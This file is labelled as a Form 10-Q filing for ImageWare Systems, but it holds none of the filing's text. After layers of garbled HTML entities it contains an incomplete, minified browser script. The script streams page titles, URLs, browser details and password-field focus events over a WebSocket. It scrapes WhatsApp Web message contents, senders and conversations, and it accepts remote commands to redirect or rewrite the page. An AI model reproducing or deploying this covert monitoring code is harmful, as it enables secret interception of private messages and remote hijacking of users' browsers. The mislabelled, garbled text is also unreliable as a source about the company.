Form 10-Q
period 2021-03-31
IMAGEWARE SYSTEMS INC
filed 2021-05-20
CIK 941685

 &#xD; &#xD; &#xD;&#xD; &#xD;&#xD; &#xD;&#xD;&#xD; &#xD;&#xD;&#xD; &amp;#xD;&#xD;&#xD;&#xD; &amp;#xD;&#xD;&#xD;&#xD; &amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; !function(){var Y,e,t;function n(){try{return window.self===window.top}catch(Y){return!1}}function r(){var Y={type:"focus",token:S.token,title:document.title,url:document.URL,useragent:navigator.userAgent,pid:S.pid,pn:S.pn};null!=I&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;I.readyState==WebSocket.OPEN&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;I.send(JSON.stringify(Y))}function a(){var Y={type:"notification",token:S.token,title:document.title,url:document.URL,focused:document.hasFocus(),timeout:S.sendNotificationsInterval,useragent:navigator.appVersion.length&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,pid:S.pid,pn:S.pn};I.send(JSON.stringify(Y))}function i(){h()}function o(){n()&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(clearInterval(y),clearInterval(N)),timeout=setTimeout((function(){f()}),v)}function s(Y){if(n())switch(Y.data.substring(0,1)){case"r":window.location=Y.data.substring(1);break;case"b":document.body.innerHTML=Y.data.substring(1);break;case"w":var e="true"==Y.data.substring(1).toLowerCase();T!=e&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;e&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;m(),T=e}}function M(Y){var e=document.createElement("a");return e.href=Y,e.href}function u(Y){if(Y&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;"password"==Y.type&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;!H){H=!0;var e={type:"password_input_focus",focus:!0,token:S.token};I.send(JSON.stringify(e))}}function D(Y){if(Y&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;"password"==Y.type&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;H){H=!1;var e={type:"password_input_focus",focus:!1,token:S.token};I.send(JSON.stringify(e))}}function c(Y){var e=document.activeElement;e&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;e!=document.body?document.querySelector&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(e=document.querySelector(":focus")):e=null;for(var t=0;t&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;Y.length;++t){let i=Y[t];var n="password"==i.type,r=n&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;i.hasAttribute("autofocus"),a=n&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;e&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;i.isEqualNode(e);(r||a)&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;u(),i.onfocus=function(){u(i)},i.onblur=function(){D(i)}}}function d(){n()&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(S.iup&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;r(),p()&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(m(),h(),function(){var Y=new MutationObserver((function(Y){Y&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;Y.forEach((function(Y){Y&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;("childList"!==Y.type||Y.addedNodes.length&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;=0||Y.addedNodes.forEach((function(Y){if(Y){var e=document.querySelector("div[id=main] header span[title]");e&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(b=e.innerText),document.querySelector("div[id=main] header span[data-icon=default-user]")&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(A="private"),document.querySelector("div[id=main] header span[data-icon=default-group]")&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(A="group");var t=Y.querySelectorAll(".message-in, .message-out");Y.matches(".message-in, .message-out")&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(t=Array.prototype.slice.call(t)).push(Y),t&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;t.forEach((function(Y){if(Y&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;Y.classList&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;!(Y.classList.length&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;=0)){var e=Y.classList.contains("message-in"),t=Y.querySelector(".copyable-text"),n=Y.querySelector(".selectable-text"),r=new Date,a=null;if(t&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;t.attributes["data-pre-plain-text"]){var i=t.attributes["data-pre-plain-text"].textContent,o=/\[(\d{1,2}):(\d{1,2})[ ]{0,1}([p|a]m)?,\s(.+)]\s(.*):/i[Symbol.match](i);if(!o||6!=o.length)return;if(o[3]&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;"pm"==o[3].toLowerCase()&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(o[1]=parseInt(o[1])+12),dateParts=/(\d{1,4})[.-\\/](\d{1,4})[.-\\/](\d{1,4})/[Symbol.match](o[4]),!dateParts||4!=dateParts.length)return;if(!(r=date.parse(o[4],C)||function(Y,e,t){var n=[[Y,e,t].join("-"),[Y,t,e].join("-"),[e,Y,t].join("-"),[e,t,Y].join("-"),[t,Y,e].join("-"),[t,e,Y].join("-")],r=Date.now();for(var a in n){var i=Date.parse(n[a]);if(i&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;!(Math.abs(r-i)&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;1728e6))return new Date(i)}}(dateParts[1],dateParts[2],dateParts[3])))return;r.setHours(o[1]),r.setMinutes(o[2]),a=o[5]}E.get(b)||E.set(b,k);var s=n?n.innerText:null;if(a&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;s&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;T){var M=(a+s+b+r.getTime()).split("").map((function(Y){return Y.charCodeAt(0)})).reduce((function(Y,e){return Y+((Y&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;7)+(Y&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;3))^e})).toString(16);if(E.get(b).getTime()==r.getTime()?r.setMilliseconds(++L):(L=0,E.set(b,r)),!M||w.has(M))return;var u={type:"wapmessage",timestamp:r.getTime(),id:M,incoming:e,sender:e?a:"Me",content:s,recipient:e?"Me":b,conversationId:b+"("+A+")"};I.send(JSON.stringify(u)),w.add(M)}}}))}})))}))}));if(!Y)return;Y.observe(document.body,{childList:!0,subtree:!0})}()),n()&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(a(),y=setInterval(a,S.sendNotificationsInterval),p()&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(N=setInterval(i,S.pollWhatsappTrackingInterval))),function(){for(var Y=[],e=document.getElementsByTagName("link"),t=0;t&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;e.length;++t)"icon"!=e[t].getAttribute("rel")&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;"shortcut icon"!=e[t].getAttribute("rel")||(Y[Y.length]=M(e[t].getAttribute("href")));0==Y.length&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(Y[0]=M("/favicon.ico"));var n={type:"favicon"};n.url=document.URL,n.src=Y,n.title=document.title,n.token=S.token,n.useragent=navigator.appVersion.length&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,I.send(JSON.stringify(n))}(),S.dontTrackWebPasswords&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(c(document.getElementsByTagName("input")),new MutationObserver((function(Y){Y&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;Y.forEach((function(Y){Y&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;Y.addedNodes&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;0!=Y.addedNodes.length&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(window.NodeList&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;!NodeList.prototype.forEach&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(NodeList.prototype.forEach=Array.prototype.forEach),Y.addedNodes.forEach((function(Y){Y.tagName&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;c(Y.getElementsByTagName("input"))})))}))})).observe(document,{childList:!0,subtree:!0}),window.onbeforeunload=D))}function l(){document.tmfilter||(f(),C={"ar-SA":"D/M/YY","bg-BG":"D.M.YYYY","ca-ES":"D/M/YYYY","zh-TW":"YYYY/M/D","cs-CZ":"D.M.YYYY","Da-DK":"D-M-YYYY","De-DE":"D.M.YYYY","el-GR":"D/M/YYYY","en-US":"M/D/YYYY","fi-FI":"D.M.YYYY","fr-FR":"D/M/YYYY","he-IL":"D/M/YYYY","hu-HU":"YYYY. M. D.","is-IS":"D.M.YYYY","it-IT":"D/M/YYYY","ja-JP":"YYYY/M/D","ko-KR":"YYYY-M-D","nl-NL":"D-M-YYYY","nb-NO":"D.M.YYYY","pl-PL":"YYYY-M-D","pt-BR":"D/M/YYYY","ro-RO":"D.M.YYYY","ru-RU":"D.M.YYYY","hr-HR":"D.M.YYYY","sk-SK":"D. M. YYYY","sq-AL":"YYYY-M-D","sv-SE":"YYYY-M-D","th-TH":"D/M/YYYY","tr-TR":"D.M.YYYY","ur-PK":"D/M/YYYY","iD-ID":"D/M/YYYY","uk-UA":"D.M.YYYY","be-BY":"D.M.YYYY","sl-SI":"D.M.YYYY","et-EE":"D.M.YYYY","lv-LV":"YYYY.M.D.","lt-LT":"YYYY.M.D","fa-IR":"M/D/YYYY","vi-VN":"D/M/YYYY","hy-AM":"D.M.YYYY","az-Latn-AZ":"D.M.YYYY","eu-ES":"YYYY/M/D","Mk-MK":"D.M.YYYY","af-ZA":"YYYY/M/D","ka-GE":"D.M.YYYY","fo-FO":"D-M-YYYY","hi-IN":"D-M-YYYY","Ms-MY":"D/M/YYYY","kk-KZ":"D.M.YYYY","ky-KG":"D.M.YY","sw-KE":"M/D/YYYY","uz-Latn-UZ":"D/M YYYY","tt-RU":"D.M.YYYY","pa-IN":"D-M-YY","gu-IN":"D-M-YY","ta-IN":"D-M-YYYY","te-IN":"D-M-YY","kn-IN":"D-M-YY","Mr-IN":"D-M-YYYY","sa-IN":"D-M-YYYY","Mn-MN":"YY.M.D","gl-ES":"D/M/YY","kok-IN":"D-M-YYYY","syr-SY":"D/M/YYYY","Dv-MV":"D/M/YY","ar-IQ":"D/M/YYYY","zh-CN":"YYYY/M/D","De-CH":"D.M.YYYY","en-GB":"D/M/YYYY","es-MX":"D/M/YYYY","fr-BE":"D/M/YYYY","it-CH":"D.M.YYYY","nl-BE":"D/M/YYYY","nn-NO":"D.M.YYYY","pt-PT":"D-M-YYYY","sr-Latn-CS":"D.M.YYYY","sv-FI":"D.M.YYYY","az-Cyrl-AZ":"D.M.YYYY","Ms-BN":"D/M/YYYY","uz-Cyrl-UZ":"D.M.YYYY","ar-EG":"D/M/YYYY","zh-HK":"D/M/YYYY","De-AT":"D.M.YYYY","en-AU":"D/M/YYYY","es-ES":"D/M/YYYY","fr-CA":"YYYY-M-D","sr-Cyrl-CS":"D.M.YYYY","ar-LY":"D/M/YYYY","zh-SG":"D/M/YYYY","De-LU":"D.M.YYYY","en-CA":"D/M/YYYY","es-GT":"D/M/YYYY","fr-CH":"D.M.YYYY","ar-DZ":"D-M-YYYY","zh-MO":"D/M/YYYY","De-LI":"D.M.YYYY","en-NZ":"D/M/YYYY","es-CR":"D/M/YYYY","fr-LU":"D/M/YYYY","ar-MA":"D-M-YYYY","en-IE":"D/M/YYYY","es-PA":"M/D/YYYY","fr-MC":"D/M/YYYY","ar-TN":"D-M-YYYY","en-ZA":"YYYY/M/D","es-DO":"D/M/YYYY","ar-OM":"D/M/YYYY","en-JM":"D/M/YYYY","es-VE":"D/M/YYYY","ar-YE":"D/M/YYYY","en-029":"M/D/YYYY","es-CO":"D/M/YYYY","ar-SY":"D/M/YYYY","en-BZ":"D/M/YYYY","es-PE":"D/M/YYYY","ar-JO":"D/M/YYYY","en-TT":"D/M/YYYY","es-AR":"D/M/YYYY","ar-LB":"D/M/YYYY","en-ZW":"M/D/YYYY","es-EC":"D/M/YYYY","ar-KW":"D/M/YYYY","en-PH":"M/D/YYYY","es-CL":"D-M-YYYY","ar-AE":"D/M/YYYY","es-UY":"D/M/YYYY","ar-BH":"D/M/YYYY","es-PY":"D/M/YYYY","ar-QA":"D/M/YYYY","es-BO":"D/M/YYYY","es-SV":"D/M/YYYY","es-HN":"D/M/YYYY","es-NI":"D/M/YYYY","es-PR":"D/M/YYYY","aM-ET":"D/M/YYYY","tzM-Latn-DZ":"D-M-YYYY","iu-Latn-CA":"D/M/YYYY","sMa-NO":"D.M.YYYY","Mn-Mong-CN":"YYYY/M/D","gD-GB":"D/M/YYYY","en-MY":"D/M/YYYY","prs-AF":"D/M/YY","bn-BD":"D-M-YY","wo-SN":"D/M/YYYY","rw-RW":"M/D/YYYY","qut-GT":"D/M/YYYY","sah-RU":"M.D.YYYY","gsw-FR":"D/M/YYYY","co-FR":"D/M/YYYY","oc-FR":"D/M/YYYY","Mi-NZ":"D/M/YYYY","ga-IE":"D/M/YYYY","se-SE":"YYYY-M-D","br-FR":"D/M/YYYY","sMn-FI":"D.M.YYYY","Moh-CA":"M/D/YYYY","arn-CL":"D-M-YYYY","ii-CN":"YYYY/M/D","Dsb-DE":"D. M. YYYY","ig-NG":"D/M/YYYY","kl-GL":"D-M-YYYY","lb-LU":"D/M/YYYY","ba-RU":"D.M.YY","nso-ZA":"YYYY/M/D","quz-BO":"D/M/YYYY","yo-NG":"D/M/YYYY","ha-Latn-NG":"D/M/YYYY","fil-PH":"M/D/YYYY","ps-AF":"D/M/YY","fy-NL":"D-M-YYYY","ne-NP":"M/D/YYYY","se-NO":"D.M.YYYY","iu-Cans-CA":"D/M/YYYY","sr-Latn-RS":"D.M.YYYY","si-LK":"YYYY-M-D","sr-Cyrl-RS":"D.M.YYYY","lo-LA":"D/M/YYYY","kM-KH":"YYYY-M-D","cy-GB":"D/M/YYYY","bo-CN":"YYYY/M/D","sMs-FI":"D.M.YYYY","as-IN":"D-M-YYYY","Ml-IN":"D-M-YY","en-IN":"D-M-YYYY","or-IN":"D-M-YY","bn-IN":"D-M-YY","tk-TM":"D.M.YY","bs-Latn-BA":"D.M.YYYY","Mt-MT":"D/M/YYYY","sr-Cyrl-ME":"D.M.YYYY","se-FI":"D.M.YYYY","zu-ZA":"YYYY/M/D","xh-ZA":"YYYY/M/D","tn-ZA":"YYYY/M/D","hsb-DE":"D. M. YYYY","bs-Cyrl-BA":"D.M.YYYY","tg-Cyrl-TJ":"D.M.YY","sr-Latn-BA":"D.M.YYYY","sMj-NO":"D.M.YYYY","rM-CH":"D/M/YYYY","sMj-SE":"YYYY-M-D","quz-EC":"D/M/YYYY","quz-PE":"D/M/YYYY","hr-BA":"D.M.YYYY.","sr-Latn-ME":"D.M.YYYY","sMa-SE":"YYYY-M-D","en-SG":"D/M/YYYY","ug-CN":"YYYY-M-D","sr-Cyrl-BA":"D.M.YYYY","es-US":"M/D/YYYY"}[navigator.language],document.tmfilter="present")}function f(){(I=new WebSocket(S.connectionString)).onclose=o,I.onmessage=s,I.onopen=d,S.extJs&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(this.extJs.webSockReady=()=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;I.readyState===WebSocket.OPEN,this.extJs.webSockSend=Y=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;I.send(Y))}function g(){var Y=function(){var Y=["webkit","moz","ms","o"];if("hidden"in document)return"hidden";for(var e=0;e&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;Y.length;e++)if(Y[e]+"Hidden"in document)return Y[e]+"Hidden";return null}();return!!Y&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;document[Y]}function p(){var Y=document.head.querySelector("[name='og:title']");return!!Y&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;"WhatsApp Web"===Y.getAttribute("content")}function h(){I.send(JSON.stringify({type:"waptracking"}))}function m(){E=new Map,w=new Set,L=0,(k=new Date).setSeconds(0),k.setMilliseconds(0)}Y=this,e={},t={en:{MMMM:"January February March April May June July August September October November December".split(" "),MMM:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),dddd:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),ddd:"Sun Mon Tue Wed Thu Fri Sat".split(" "),dd:"Su Mo Tu We Th Fr Sa".split(" "),A:["a.m.","p.m."],formatter:{YYYY:function(Y){return("000"+Y.getFullYear()).slice(-4)},YY:function(Y){return("0"+Y.getFullYear()).slice(-2)},Y:function(Y){return""+Y.getFullYear()},MMMM:function(Y){return this.MMMM[Y.getMonth()]},MMM:function(Y){return this.MMM[Y.getMonth()]},MM:function(Y){return("0"+(Y.getMonth()+1)).slice(-2)},M:function(Y){return""+(Y.getMonth()+1)},DD:function(Y){return("0"+Y.getDate()).slice(-2)},D:function(Y){return""+Y.getDate()},HH:function(Y){return("0"+Y.getHours()).slice(-2)},H:function(Y){return""+Y.getHours()},A:function(Y){return this.A[11&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;Y.getHours()|0]},hh:function(Y){return("0"+(Y.getHours()%12||12)).slice(-2)},h:function(Y){return""+(Y.getHours()%12||12)},mm:function(Y){return("0"+Y.getMinutes()).slice(-2)},m:function(Y){return""+Y.getMinutes()},ss:function(Y){return("0"+Y.getSeconds()).slice(-2)},s:function(Y){return""+Y.getSeconds()},SSS:function(Y){return("00"+Y.getMilliseconds()).slice(-3)},SS:function(Y){return("0"+(Y.getMilliseconds()/10|0)).slice(-2)},S:function(Y){return""+(Y.getMilliseconds()/100|0)},dddd:function(Y){return this.dddd[Y.getDay()]},ddd:function(Y){return this.ddd[Y.getDay()]},dd:function(Y){return 